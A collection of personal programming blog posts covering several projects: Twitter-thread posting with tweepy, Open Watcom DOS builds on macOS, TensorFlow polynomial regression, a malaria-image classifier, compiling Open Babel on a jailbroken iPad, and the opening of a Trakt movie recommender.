Remember to replace any spaces in the flair with _
E.g. flair:Snail_Mail limited to r/penpals will only show posts that have the flair Snail Mail.
I wish this was documented somewhere.
I finally completed my first quick and dirty vaporwave remix of "I Want It That Way" by the Backstreet Boys.
Vaporwave is all about A E S T H E T I C S. Vaporwave is a music genre that emerged as a parody of Chillwave, shared more as a meme than as a proper musical genre. Of course, this changed as the genre matured.
The first track widely considered to be actual Vaporwave is Ramona Xavier's Macintosh Plus; this set the guidelines for making Vaporwave.
There you have your very own Vaporwave track.
(Now, there are some tracks being produced which are not remixes and are original.)
The fact that there are concrete steps for producing Vaporwave gave me the idea that Vaporwave could actually be generated programmatically. Stay tuned for when I publish the program I am working on (generating A E S T H E T I C artwork and remixes).
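As a rough teaser, here is a minimal sketch of the classic slowed-down transform using pydub (this is my own illustration and an assumption about the approach; the file names are hypothetical):
from pydub import AudioSegment

song = AudioSegment.from_file("i_want_it_that_way.mp3")  # hypothetical input file

# Lower the pitch and tempo by pretending the audio was recorded at a
# slower frame rate, then resample back to a standard rate.
slowed = song._spawn(song.raw_data, overrides={
    "frame_rate": int(song.frame_rate * 0.8)
}).set_frame_rate(44100)

slowed.export("vaporwave_remix.mp3", format="mp3")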
Why? Eh, no good reason, but should be fun.
I recently shifted my website to a static site generator I wrote specifically for myself. Thus, it should be easy to just add a feature to check for new posts, split the text into chunks for Twitter threads and tweet them. I am not handling lists or images right now.
First, the dependency: tweepy for tweeting.
pip install tweepy
import os
import tweepy
consumer_key = os.environ["consumer_key"]
consumer_secret = os.environ["consumer_secret"]
access_token = os.environ["access_token"]
access_token_secret = os.environ["access_token_secret"]
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
The program needs to convert the blog post into text fragments.
It reads the markdown file, removes the YAML front matter at the top, checks for headers, and splits the content.
sample_markdown_file = "path/to/post.md"  # hypothetical path to the post being tweeted

tweets = []
delim_count = 0  # number of '---' lines seen; YAML front matter ends after the second

with open(sample_markdown_file) as f:
    for line in f.readlines():
        # Skip the YAML front matter between the first two '---' lines
        if delim_count <= 1:
            if line == "---\n":
                delim_count += 1
            continue
        line = line.strip()
        line += " "
        if "#" in line:
            # Strip markdown header markers and pad headers with blank lines
            line = line.replace("#", "").strip()
            line = "\n" + line
            line += "\n\n"
        try:
            # Append to the current chunk if it still fits in a tweet
            if len(tweets[-1]) < 260 and (len(tweets[-1]) + len(line)) <= 260:
                tweets[-1] += line
            else:
                tweets.append(line)
        except IndexError:
            # First chunk: the tweets list is still empty
            if len(line) > 260:
                print("ERROR")
            else:
                tweets.append(line)
Every status update posted with tweepy has an ID attached to it; for the next tweet in the thread, we pass that ID when calling the function.
For every tweet fragment, it also appends a counter of the form idx/n.
for idx, tweet in enumerate(tweets):
    tweet += " {}/{}".format(idx+1, len(tweets))
    if idx == 0:
        a = api.update_status(tweet)
    else:
        a = api.update_status(tweet, in_reply_to_status_id=a.id)
    print(len(tweet), end=" ")
    print("{}/{}\n".format(idx+1, len(tweets)))
Finally, it replies to the last tweet in the thread with the link of the post.
api.update_status("Web Version: {}".format(post_link))
[Embedded tweet: "Posting Blog Posts as Twitter Threads Part 1/n — Why? Eh, no good reason, but should be fun. Plan of Action: I recently shifted my website to a static site generator I wrote specifically for myself. 1/5 … Web Version: https://t.co/zROU1F5DYv" — Navan Chauhan (@navanchauhan), June 24, 2021]
For the next part, I will try to append the code as well. I actually added the code to this post after running the program.
Technically this should work for any platform that Open Watcom 2 supports compiling binaries for. Some instructions are based on a post at retrocoding.net and John Tsiombikas's post.
You should already have XCode / Command Line Tools, and Homebrew installed. To compile Open Watcom for DOS you will need DOSBox (I use DOSBox-X).
brew install --cask dosbox-x
If this process is super annoying, I might make a custom homebrew tap to build and install Open Watcom
git clone https://github.com/open-watcom/open-watcom-v2
cp open-watcom-v2/setvars.sh custom_setvars.sh
Now, edit this custom_setvars.sh file. My file looks like this:
#!/bin/zsh
export OWROOT="/Users/navanchauhan/Developer/8088Stuff/open-watcom-v2"
export OWTOOLS=CLANG
export OWDOCBUILD=0
export OWGUINOBUILD=0
export OWDISTRBUILD=0
export OWDOSBOX="/Applications/dosbox-x.app/Contents/MacOS/dosbox-x"
export OWOBJDIR=binbuildV01
. "$OWROOT/cmnvars.sh"
echo "OWROOT=$OWROOT"
cd "$OWROOT"
Note: your OWROOT is definitely going to be in a different location.
source ./custom_setvars.sh
./build.sh
./build.sh rel
This will build, and then copy everything to the rel
directory inside open-watcom-v2
directory. Since I ran this on an Apple Silicon Mac,
all the binaries for me are in the armo64
directory. You can now move everything inside the rel folder to another location, or create a simple
script to init all variables whenever you want.
I like having a script called exportVarsForDOS.sh
#!/bin/zsh
export WATCOM=/Users/navanchauhan/Developer/8088Stuff/open-watcom-v2/rel
export PATH=$PATH:$WATCOM/armo64
export EDDAT=$WATCOM/eddat
# For DOS 8088/8086 development
export INCLUDE=$WATCOM/h
export LIB=$WATCOM/lib286 # You don't really need this
Then, when you need to load up these variables, you can simply run source exportVarsForDOS.sh
or . exportVarsForDOS.sh
Create a new file called example1.c
#include <stdio.h>

int main() {
    printf("Hello World!");
    return 0;
}
First we compile the code:
$ wcc example1.c
Open Watcom C x86 16-bit Optimizing Compiler
Version 2.0 beta Mar 15 2024 13:11:55
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1984-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
example1.c: 7 lines, included 818, 0 warnings, 0 errors
Code size: 19
Then, link to make an executable:
$ wlink name example1.exe system dos file example1.o
Open Watcom Linker Version 2.0 beta Mar 15 2024 13:10:09
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1985-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
loading object files
searching libraries
creating a DOS executable
If you want to test this executable, jump to the section titled Testing with DOSBox-X below.
We can also automate this with a Makefile and wmake. Here is a simple example:
obj = main.o hello.o
bin = tizts.com

CC = wcc
CFLAGS = -0

LD = wlink

$(bin): $(obj)
	$(LD) name $@ system dos file main.o file hello.o

.c.o:
	$(CC) $(CFLAGS) $<

clean:
	rm $(obj) $(bin)
where main.c is:
void hello(void);

int main(void)
{
    hello();
    return 0;
}
and hello.c is:
/* hello.c */
#include <stdio.h>

void hello(void)
{
    printf("Hello!");
}
To compile into tizts.com, simply run wmake:
$ wmake
Open Watcom Make Version 2.0 beta Mar 15 2024 13:10:16
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1988-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
wcc -0 main.c
Open Watcom C x86 16-bit Optimizing Compiler
Version 2.0 beta Mar 15 2024 13:11:55
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1984-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
main.c(8): Warning! W138: No newline at end of file
main.c: 8 lines, included 53, 1 warnings, 0 errors
Code size: 12
wcc -0 hello.c
Open Watcom C x86 16-bit Optimizing Compiler
Version 2.0 beta Mar 15 2024 13:11:55
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1984-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
hello.c: 8 lines, included 818, 0 warnings, 0 errors
Code size: 17
wlink name tizts.com system dos file main.o file hello.o
Open Watcom Linker Version 2.0 beta Mar 15 2024 13:10:09
Copyright (c) 2002-2024 The Open Watcom Contributors. All Rights Reserved.
Portions Copyright (c) 1985-2002 Sybase, Inc. All Rights Reserved.
Source code is available under the Sybase Open Watcom Public License.
See https://github.com/open-watcom/open-watcom-v2#readme for details.
loading object files
searching libraries
creating a DOS executable
Create a file called CMakeLists.txt
project(hello)
set(SOURCES abc.c)
add_executable(hello ${SOURCES})
where abc.c is:
#include <stdio.h>

int main() {
    printf("Does this work?");
    return 0;
}
mkdir build
cd build
And configure using CMake, then run wmake on the generated makefiles:
cmake -DCMAKE_SYSTEM_NAME=DOS -DCMAKE_SYSTEM_PROCESSOR=I86 -DCMAKE_C_FLAGS="-0 -bt=dos -d0 -oaxt" -G "Watcom WMake" ..
wmake
There you have it. Three different ways to compile a C program on a macOS device in 2024 that can run on an IBM PC 5150 (which was released in 1981!)
Testing with DOSBox-X
cp example1.exe ~/Downloads
/Applications/dosbox-x.app/Contents/MacOS/dosbox-x
In DOSBox-X, we now mount the ~/Downloads folder as our C: drive:
mount C ~/Downloads
Switch to the C drive
C:
Run the program:
example1
My DOSBox setup might look slightly different than yours...
I have a similar post titled Polynomial Regression Using Tensorflow that used tensorflow.compat.v1 (which still works as of TF 2.16). But I thought it would be nicer to redo it with newer TF versions.
I will be skipping all the introductions about polynomial regression and jumping straight to the code. Personally, I prefer using scikit-learn for this task.
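For comparison, a quick scikit-learn sketch of the same kind of fit (my own illustration, assuming scikit-learn is installed; it uses the dataset introduced below):
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures

df = pd.read_csv("data.csv")
X_poly = PolynomialFeatures(degree=3).fit_transform(df[["Level"]])  # cubic features
reg = LinearRegression().fit(X_poly, df["Salary"])
print(reg.score(X_poly, df["Salary"]))  # R^2 of the fit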
Again, we will be using https://drive.google.com/file/d/1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9/view (Salary vs Position Dataset)
If you are in a Python Notebook environment like Kaggle or Google Colaboratory, you can simply run:
!wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=1tNL4jxZEfpaP4oflfSn6pIHJX7Pachm9' -O data.csv
If you just want to copy-paste the code, scroll to the bottom for the entire snippet. Here, I will try to walk through setting up the code for a 3rd-degree (cubic) polynomial.
import pandas as pd
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv("data.csv")
Here, we initialize the X and Y values as constants, since they are not going to change. The coefficients are defined as variables.
X = tf.constant(df["Level"], dtype=tf.float32)
Y = tf.constant(df["Salary"], dtype=tf.float32)
coefficients = [tf.Variable(np.random.randn() * 0.01, dtype=tf.float32) for _ in range(4)]
Here, X
and Y
are the values from our dataset. We initialize the coefficients for the equations as small random values.
These coefficients are evaluated by TensorFlow's tf.math.polyval function, which returns the n-th order polynomial based on how many coefficients are passed. tf.math.polyval treats the first coefficient as the highest-order term, so since our list contains 4 variables, it will be evaluated as:
y = coefficients[0]*(x**3) + coefficients[1]*(x**2) + coefficients[2]*x + coefficients[3]
Which is equivalent to the general cubic equation y = ax^3 + bx^2 + cx + d.
optimizer = tf.keras.optimizers.Adam(learning_rate=0.3)
num_epochs = 10_000

for epoch in range(num_epochs):
    with tf.GradientTape() as tape:
        y_pred = tf.math.polyval(coefficients, X)
        loss = tf.reduce_mean(tf.square(Y - y_pred))
    grads = tape.gradient(loss, coefficients)
    optimizer.apply_gradients(zip(grads, coefficients))
    if (epoch+1) % 1000 == 0:
        print(f"Epoch: {epoch+1}, Loss: {loss.numpy()}")
In TensorFlow 1, we would have been using tf.Session
instead.
Here we are using GradientTape()
instead, to keep track of the loss evaluation and coefficients. This is crucial, as our optimizer needs these gradients to be able to optimize our coefficients.
Our loss function is Mean Squared Error (MSE): MSE = (1/n) * Σ (y_i - ŷ_i)^2, where ŷ is the predicted value and y is the actual value.
final_coefficients = [c.numpy() for c in coefficients]
print("Final Coefficients:", final_coefficients)
plt.plot(df["Level"], df["Salary"], label="Original Data")
plt.plot(df["Level"],[tf.math.polyval(final_coefficients, tf.constant(x, dtype=tf.float32)).numpy() for x in df["Level"]])
plt.ylabel('Salary')
plt.xlabel('Position')
plt.title("Salary vs Position")
plt.show()
This should work regardless of the Keras backend version (2 or 3)
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("data.csv")
############################
## Change Parameters Here ##
############################
x_column = "Level" #
y_column = "Salary" #
degree = 2 #
learning_rate = 0.3 #
num_epochs = 25_000 #
############################
X = tf.constant(df[x_column], dtype=tf.float32)
Y = tf.constant(df[y_column], dtype=tf.float32)
coefficients = [tf.Variable(np.random.randn() * 0.01, dtype=tf.float32) for _ in range(degree + 1)]
optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
for epoch in range(num_epochs):
    with tf.GradientTape() as tape:
        y_pred = tf.math.polyval(coefficients, X)
        loss = tf.reduce_mean(tf.square(Y - y_pred))
    grads = tape.gradient(loss, coefficients)
    optimizer.apply_gradients(zip(grads, coefficients))
    if (epoch+1) % 1000 == 0:
        print(f"Epoch: {epoch+1}, Loss: {loss.numpy()}")
final_coefficients = [c.numpy() for c in coefficients]
print("Final Coefficients:", final_coefficients)
print("Final Equation:", end=" ")
for i in range(degree+1):
    print(f"{final_coefficients[i]} * x^{degree-i}", end=" + " if i < degree else "\n")

plt.plot(X, Y, label="Original Data")
plt.plot(X, [tf.math.polyval(final_coefficients, tf.constant(x, dtype=tf.float32)).numpy() for x in df[x_column]], label="Our Polynomial")
plt.ylabel(y_column)
plt.xlabel(x_column)
plt.title(f"{x_column} vs {y_column}")
plt.legend()
plt.show()
This relies on the Optimizer's minimize
function and uses the var_list
parameter to update the variables.
This will not work with Keras 3 backend in TF 2.16.0 and above unless you switch to the legacy backend.
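One way to switch (an assumption on my part, not something from the original post) is to install the tf-keras package and opt in to the legacy backend before importing TensorFlow:
import os
os.environ["TF_USE_LEGACY_KERAS"] = "1"  # requires `pip install tf-keras`

import tensorflow as tf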
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("data.csv")
############################
## Change Parameters Here ##
############################
x_column = "Level" #
y_column = "Salary" #
degree = 2 #
learning_rate = 0.3 #
num_epochs = 25_000 #
############################
X = tf.constant(df[x_column], dtype=tf.float32)
Y = tf.constant(df[y_column], dtype=tf.float32)
coefficients = [tf.Variable(np.random.randn() * 0.01, dtype=tf.float32) for _ in range(degree + 1)]
optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
def loss_function():
    pred_y = tf.math.polyval(coefficients, X)
    return tf.reduce_mean(tf.square(pred_y - Y))

for epoch in range(num_epochs):
    optimizer.minimize(loss_function, var_list=coefficients)
    if (epoch+1) % 1000 == 0:
        current_loss = loss_function().numpy()
        print(f"Epoch {epoch+1}: Training Loss: {current_loss}")

final_coefficients = [c.numpy() for c in coefficients]
print("Final Coefficients:", final_coefficients)
print("Final Equation:", end=" ")
for i in range(degree+1):
    print(f"{final_coefficients[i]} * x^{degree-i}", end=" + " if i < degree else "\n")
plt.plot(X, Y, label="Original Data")
plt.plot(X,[tf.math.polyval(final_coefficients, tf.constant(x, dtype=tf.float32)).numpy() for x in df[x_column]], label="Our Polynomial")
plt.ylabel(y_column)
plt.xlabel(x_column)
plt.legend()
plt.title(f"{x_column} vs {y_column}")
plt.show()
As always, remember to tweak the parameters and choose the correct model for the job. A polynomial regression model might not even be the best model for this particular dataset.
How would you modify this code to use another type of nonlinear regression? Say, an exponential model of the form y = a * b^x?
Hint: Your loss calculation would be similar to:
bx = tf.pow(coefficients[1], X)
pred_y = tf.math.multiply(coefficients[0], bx)
loss = tf.reduce_mean(tf.square(pred_y - Y))
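For reference, here is a minimal sketch of fitting y = a * b^x with the same GradientTape pattern (my own illustration; initializing b near 1 keeps the power well-behaved):
a = tf.Variable(1.0, dtype=tf.float32)
b = tf.Variable(1.0, dtype=tf.float32)  # keep b positive so b**x stays real
optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)

for epoch in range(10_000):
    with tf.GradientTape() as tape:
        pred_y = tf.math.multiply(a, tf.pow(b, X))
        loss = tf.reduce_mean(tf.square(pred_y - Y))
    grads = tape.gradient(loss, [a, b])
    optimizer.apply_gradients(zip(grads, [a, b]))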
Why a Hello World post?
Just re-did the entire website using Publish (by John Sundell). So, a new hello world post :)
https://s3-us-west-2.amazonaws.com/s.cdpn.io/148866/img-original.jpg
In order to be able to access Kaggle datasets, you will need to have an account on Kaggle (which is free).
Copy the kaggle.json API token file to the root folder of your Google Drive.
import os
from google.colab import drive
drive.mount('/content/drive')
After this, click on the URL in the output section, log in, and then paste the auth code.
os.environ['KAGGLE_CONFIG_DIR'] = "/content/drive/My Drive/"
Voila! You can now download Kaggle datasets.
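For example, with a hypothetical dataset slug (this assumes the kaggle CLI package is available, e.g. via pip install kaggle):
!kaggle datasets download -d owner/dataset-name  # hypothetical slug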
Done during Google Code-In. Org: TensorFlow.
%tensorflow_version 2.x #This is for telling Colab that you want to use TF 2.0, ignore if running on local machine
from PIL import Image # We use the PIL Library to resize images
import numpy as np
import os
import cv2
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
import pandas as pd
import matplotlib.pyplot as plt
!wget ftp://lhcftp.nlm.nih.gov/Open-Access-Datasets/Malaria/cell_images.zip
!unzip cell_images.zip
We resize all the images to 50x50 and add the numpy array of each image, along with its label (infected or not), to common arrays.
data = []
labels = []

Parasitized = os.listdir("./cell_images/Parasitized/")
for parasite in Parasitized:
    try:
        image = cv2.imread("./cell_images/Parasitized/" + parasite)
        image_from_array = Image.fromarray(image, 'RGB')
        size_image = image_from_array.resize((50, 50))
        data.append(np.array(size_image))
        labels.append(0)
    except AttributeError:
        print("")

Uninfected = os.listdir("./cell_images/Uninfected/")
for uninfect in Uninfected:
    try:
        image = cv2.imread("./cell_images/Uninfected/" + uninfect)
        image_from_array = Image.fromarray(image, 'RGB')
        size_image = image_from_array.resize((50, 50))
        data.append(np.array(size_image))
        labels.append(1)
    except AttributeError:
        print("")
df = np.array(data)
labels = np.array(labels)
(X_train, X_test) = df[(int)(0.1*len(df)):],df[:(int)(0.1*len(df))]
(y_train, y_test) = labels[(int)(0.1*len(labels)):],labels[:(int)(0.1*len(labels))]
s=np.arange(X_train.shape[0])
np.random.shuffle(s)
X_train=X_train[s]
y_train=y_train[s]
X_train = X_train/255.0
X_test = X_test/255.0  # the test data needs the same scaling
By creating a sequential model, we create a linear stack of layers.
Note: The input shape for the first layer is (50, 50, 3), which corresponds to the size of the resized images (with 3 color channels).
model = models.Sequential()
model.add(layers.Conv2D(filters=16, kernel_size=2, padding='same', activation='relu', input_shape=(50,50,3)))
model.add(layers.MaxPooling2D(pool_size=2))
model.add(layers.Conv2D(filters=32,kernel_size=2,padding='same',activation='relu'))
model.add(layers.MaxPooling2D(pool_size=2))
model.add(layers.Conv2D(filters=64,kernel_size=2,padding="same",activation="relu"))
model.add(layers.MaxPooling2D(pool_size=2))
model.add(layers.Dropout(0.2))
model.add(layers.Flatten())
model.add(layers.Dense(500,activation="relu"))
model.add(layers.Dropout(0.2))
model.add(layers.Dense(2, activation="softmax"))  # 2 output neurons, one per class
model.summary()
We use the Adam optimiser, an adaptive learning rate optimisation algorithm designed specifically for training deep neural networks: it adjusts its learning rate automatically to get the best results.
model.compile(optimizer="adam",
loss="sparse_categorical_crossentropy",
metrics=["accuracy"])
We train the model for 10 epochs on the training data and then validate it using the testing data
history = model.fit(X_train,y_train, epochs=10, validation_data=(X_test,y_test))
Train on 24803 samples, validate on 2755 samples
Epoch 1/10
24803/24803 [==============================] - 57s 2ms/sample - loss: 0.0786 - accuracy: 0.9729 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 2/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0746 - accuracy: 0.9731 - val_loss: 0.0290 - val_accuracy: 0.9996
Epoch 3/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0672 - accuracy: 0.9764 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 4/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0601 - accuracy: 0.9789 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 5/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0558 - accuracy: 0.9804 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 6/10
24803/24803 [==============================] - 57s 2ms/sample - loss: 0.0513 - accuracy: 0.9819 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 7/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0452 - accuracy: 0.9849 - val_loss: 0.3190 - val_accuracy: 0.9985
Epoch 8/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0404 - accuracy: 0.9858 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 9/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0352 - accuracy: 0.9878 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
Epoch 10/10
24803/24803 [==============================] - 58s 2ms/sample - loss: 0.0373 - accuracy: 0.9865 - val_loss: 0.0000e+00 - val_accuracy: 1.0000
accuracy = history.history['accuracy'][-1]*100
loss = history.history['loss'][-1]*100
val_accuracy = history.history['val_accuracy'][-1]*100
val_loss = history.history['val_loss'][-1]*100
print(
'Accuracy:', accuracy,
'\nLoss:', loss,
'\nValidation Accuracy:', val_accuracy,
'\nValidation Loss:', val_loss
)
Accuracy: 98.64532351493835
Loss: 3.732407123270176
Validation Accuracy: 100.0
Validation Loss: 0.0
We have achieved 98% Accuracy!
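To sanity-check the model on a single image, something like this should work (a sketch; label 0 is Parasitized and 1 is Uninfected, per the loading code above):
probs = model.predict(X_test[:1])  # X_test is already scaled above
print("Parasitized" if probs.argmax() == 0 else "Uninfected")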
Since my summer vacation started today, I had the brilliant idea of trying to run Open Babel on my iPad. To give a little background, I had previously tried to compile AutoDock Vina using a cross-compiler, and I had failed miserably.
I am running the checkra1n jailbreak on my iPad and the unc0ver jailbreak on my phone.
Well, just because I can. This is literally the only reason I tried compiling it and also partially because in the long run I want to compile AutoDock Vina so I can do Molecular Docking on the go.
How hard can it be to compile Open Babel, right? It is just a simple piece of software with clear and concise build instructions. I just need to use cmake to build and then make to install.
It was 11 AM. I installed clang, cmake, and make from Sam Bingner's repository, fired up ssh, downloaded the source code, and ran the build command.
I couldn't even get cmake to run. I did a little digging around StackOverflow and found that I needed the iOS SDK. Sure, no problem. I waited for Xcode to update and transferred the SDKs to my iPad:
scp -r /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk root@192.168.1.8:/var/sdks/
Then I told cmake that this is the location for my SDK 😠. Successful! Now I just needed to run make.
It gave an error saying that thread-local storage is not supported on this device:
[ 0%] Building CXX object src/CMakeFiles/openbabel.dir/alias.cpp.o
[ 1%] Building CXX object src/CMakeFiles/openbabel.dir/atom.cpp.o
In file included from /var/root/obabel/ob-src/src/atom.cpp:28:
In file included from /var/root/obabel/ob-src/include/openbabel/ring.h:29:
/var/root/obabel/ob-src/include/openbabel/typer.h:70:1: error: thread-local storage is not supported for the current target
THREAD_LOCAL OB_EXTERN OBAtomTyper atomtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
In file included from /var/root/obabel/ob-src/src/atom.cpp:28:
In file included from /var/root/obabel/ob-src/include/openbabel/ring.h:29:
/var/root/obabel/ob-src/include/openbabel/typer.h:84:1: error: thread-local storage is not supported for the current target
THREAD_LOCAL OB_EXTERN OBAromaticTyper aromtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
/var/root/obabel/ob-src/src/atom.cpp:107:10: error: thread-local storage is not supported for the current target
extern THREAD_LOCAL OBAromaticTyper aromtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
/var/root/obabel/ob-src/src/atom.cpp:108:10: error: thread-local storage is not supported for the current target
extern THREAD_LOCAL OBAtomTyper atomtyper;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
/var/root/obabel/ob-src/src/atom.cpp:109:10: error: thread-local storage is not supported for the current target
extern THREAD_LOCAL OBPhModel phmodel;
^
/var/root/obabel/ob-src/include/openbabel/mol.h:35:24: note: expanded from macro 'THREAD_LOCAL'
# define THREAD_LOCAL thread_local
^
5 errors generated.
make[2]: *** [src/CMakeFiles/openbabel.dir/build.make:76: src/CMakeFiles/openbabel.dir/atom.cpp.o] Error 1
make[1]: *** [CMakeFiles/Makefile2:1085: src/CMakeFiles/openbabel.dir/all] Error 2
make: *** [Makefile:129: all] Error 2
Strange, but alright; there is nothing that hasn't been answered on the internet.
I did a little digging around and could not find a solution 😔
As a temporary fix, I disabled multithreading by commenting out those lines in the source code.
This was pretty straightforward; I tried installing it on my iPad and it was working pretty smoothly.
So I AirDropped the .deb to my phone and tried installing it. The installation was successful, but when I ran obabel it just aborted.
It turns out that because I had set the install target to a separate folder while compiling, the binaries were referencing a non-existent dylib rather than the one in the /usr/lib folder. As a quick workaround, I transferred the deb folder to my laptop and ran install_name_tool -change /var/root/obabel/ob-build/lib/libopenbabel.7.dylib /usr/lib/libopenbabel.7.dylib (after inspecting with otool) on all the executables, and then signed them using jtool.
I then installed it and everything went smoothly. I even ran obabel and it executed perfectly, showing the version number 3.1.0 ✌️ Ahh, smooth victory.
Nope. When I tried converting from SMILES to pdbqt, it gave an error saying plugin not found. This was weird.
So I just copied the entire build folder from my iPad to my phone and tried running it. Oops, Apple Sandbox Error, Oh no!
I spent 2 hours on this problem, only to read the documentation and realise I hadn't set up the environment variables 🤦‍♂️
export BABEL_DATADIR="/usr/share/openbabel/3.1.0"
export BABEL_LIBDIR="/usr/lib/openbabel/3.1.0"
This was the tragedy of trying to compile something without knowing enough about compiling. It is 11:30 as of writing this. Something as trivial as this should not have taken me so long. Am I going to try to compile AutoDock Vina next? 🤔 Maybe.
Also, if you want to try Open Babel on your jailbroken iDevice, install the package from my repository (you need to apply the above-mentioned final fix :p). This was tested on iOS 13.5; I cannot tell whether it will work on other versions.
Hopefully, I add some more screenshots to this post.
Edit 1: Added Screenshots, had to replicate the errors.
I recently came across a movie/TV-show recommender, couchmoney.tv. I loved it. I decided that I wanted to build something similar, so I could tinker with it as much as I wanted.
I also wanted a recommendation system I could use via a REST API. Although I have not included that part in this post, I did eventually create it.
By measuring the cosine of the angle between two vectors, you get a value in the range [-1, 1] ([0, 1] for non-negative vectors), where higher means more similar and 0 means no similarity. So, if we find a way to represent information about movies as vectors, we can use cosine similarity as a metric to find similar movies.
As we are recommending just based on the content of the movies, this is called a content based recommendation system.
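As a quick illustration (my own sketch, not part of the original pipeline), cosine similarity is just the normalized dot product:
import numpy as np

def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
    # cos(theta) = (a . b) / (|a| * |b|)
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

print(cosine_similarity(np.array([1.0, 0.0]), np.array([1.0, 1.0])))  # ~0.707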
Trakt exposes a nice API to search for movies/tv-shows. To access the API, you first need to get an API key (the Trakt ID you get when you create a new application).
I decided to use SQL-Alchemy with a SQLite backend just to make my life easier if I decided on switching to Postgres anytime I felt like.
First, I needed to check the total number of records in Trakt’s database.
import requests
import os
trakt_id = os.getenv("TRAKT_ID")
api_base = "https://api.trakt.tv"
headers = {
"Content-Type": "application/json",
"trakt-api-version": "2",
"trakt-api-key": trakt_id
}
params = {
"query": "",
"years": "1900-2021",
"page": "1",
"extended": "full",
"languages": "en"
}
res = requests.get(f"{api_base}/search/movie",headers=headers,params=params)
total_items = res.headers["x-pagination-item-count"]
print(f"There are {total_items} movies")
There are 333946 movies
Next, I declared the database schema in database.py:
import sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey, PickleType
from sqlalchemy import insert
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import IntegrityError
meta = MetaData()
movies_table = Table(
    "movies",
    meta,
    Column("trakt_id", Integer, primary_key=True, autoincrement=False),
    Column("title", String),
    Column("overview", String),
    Column("genres", String),
    Column("year", Integer),
    Column("released", String),
    Column("runtime", Integer),
    Column("country", String),
    Column("language", String),
    Column("rating", Integer),
    Column("votes", Integer),
    Column("comment_count", Integer),
    Column("tagline", String),
    Column("embeddings", PickleType)
)

# Helper function to connect to the db
def init_db_stuff(database_url: str):
    engine = create_engine(database_url)
    meta.create_all(engine)
    Session = sessionmaker(bind=engine)
    return engine, Session
In the end, I could have dropped the embeddings field from the table schema as I never got around to using it.
from database import *
from tqdm import tqdm
import requests
import os
trakt_id = os.getenv("TRAKT_ID")
max_requests = 5000 # How many requests I wanted to wrap everything up in
req_count = 0 # A counter for how many requests I have made
years = "1900-2021"
page = 1 # The initial page number for the search
extended = "full" # Required to get additional information
limit = "10" # No of entires per request -- This will be automatically picked based on max_requests
languages = "en" # Limit to English
api_base = "https://api.trakt.tv"
database_url = "sqlite:///jlm.db"
headers = {
"Content-Type": "application/json",
"trakt-api-version": "2",
"trakt-api-key": trakt_id
}
params = {
"query": "",
"years": years,
"page": page,
"extended": extended,
"limit": limit,
"languages": languages
}
# Helper function to get desirable values from the response
def create_movie_dict(movie: dict):
    m = movie["movie"]
    movie_dict = {
        "title": m["title"],
        "overview": m["overview"],
        "genres": m["genres"],
        "language": m["language"],
        "year": int(m["year"]),
        "trakt_id": m["ids"]["trakt"],
        "released": m["released"],
        "runtime": int(m["runtime"]),
        "country": m["country"],
        "rating": int(m["rating"]),
